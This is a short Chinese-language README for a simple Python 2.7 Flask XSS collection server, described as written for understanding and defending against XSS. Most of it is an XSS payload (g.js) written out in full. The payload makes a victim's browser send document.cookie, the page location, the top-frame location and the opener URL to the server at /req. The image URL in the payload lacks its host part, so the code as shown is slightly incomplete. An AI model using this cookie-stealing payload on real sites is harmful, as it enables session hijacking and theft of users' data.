##Xss服务端代码,简易实现,用于理解、分析以便防御xss攻击##
-
运行环境
python2.7
Flaskpip install flask
-
运行服务
python xss.py
-
访问生成xss http://127.0.0.1/g.js
-
xss会主支请求http://127.0.0.1/req将用户浏览器当前页面的信息打印通过参数传递过来
location=?
toplocation=?
cookie=?
opener=?
- 主要js代码
(function(){
(new Image()).src='location='+escape((function(){try{return document.location.href}catch(e){return ''}})())
+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())
+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())
+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());
})()